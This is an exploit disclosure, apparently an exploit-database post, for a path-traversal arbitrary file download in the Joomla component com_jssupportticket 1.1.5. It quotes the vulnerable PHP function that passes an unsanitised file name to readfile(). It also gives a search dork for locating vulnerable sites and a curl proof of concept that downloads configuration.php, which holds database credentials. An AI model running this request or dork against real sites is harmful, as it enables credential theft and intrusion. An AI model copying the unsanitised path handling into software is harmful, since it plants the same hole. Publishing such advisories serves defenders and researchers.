Share
#Exploit Title: Joomla! component com_jssupportticket - Arbitrary File Download
#Dork: inurl:"index.php?option=com_jssupportticket"
#Date: 08.08.19
#Exploit Author: qw3rTyTy
#Vendor Homepage: http://joomsky.com/
#Software Link: https://www.joomsky.com/46/download/1.html
#Version: 1.1.5
#Tested on: Debian/nginx/joomla 3.9.0
#####################################
#Vulnerability details:
#####################################
Vulnerable code is in line 1411 in file admin/models/ticket.php

  1382	    function getDownloadAttachmentByName($file_name,$id){
  1383	        if(empty($file_name)) return false;
  1384	        if(!is_numeric($id)) return false;
  1385	        $db = JFactory::getDbo();
  1386	        $filename = str_replace(' ', '_',$file_name);
  1387	        $query = "SELECT attachmentdir FROM `#__js_ticket_tickets` WHERE id = ".$id;
  1388	        $db->setQuery($query);
  1389	        $foldername = $db->loadResult();
  1390	
  1391	        $datadirectory = $this->getJSModel('config')->getConfigurationByName('data_directory');
  1392	        $base = JPATH_BASE;
  1393	        if(JFactory::getApplication()->isAdmin()){
  1394	            $base = substr($base, 0, strlen($base) - 14); //remove administrator    
  1395	        }  
  1396	        $path = $base.'/'.$datadirectory;
  1397	        $path = $path . '/attachmentdata';
  1398	        $path = $path . '/ticket/' . $foldername;
  1399	        $file = $path . '/' . $filename;
  1400	
  1401	        header('Content-Description: File Transfer');
  1402	        header('Content-Type: application/octet-stream');
  1403	        header('Content-Disposition: attachment; filename=' . basename($file));
  1404	        header('Content-Transfer-Encoding: binary');
  1405	        header('Expires: 0');
  1406	        header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
  1407	        header('Pragma: public');
  1408	        header('Content-Length: ' . filesize($file));
  1409	        //ob_clean();
  1410	        flush();
  1411	        readfile($file);		//!!!
  1412	        exit();
  1413	        exit;
  1414	    }

#####################################
#PoC:
#####################################
$> curl -X GET -i "http://localhost/index.php?option=com_jssupportticket&c=ticket&task=downloadbyname&id=0&name=../../../configuration.php"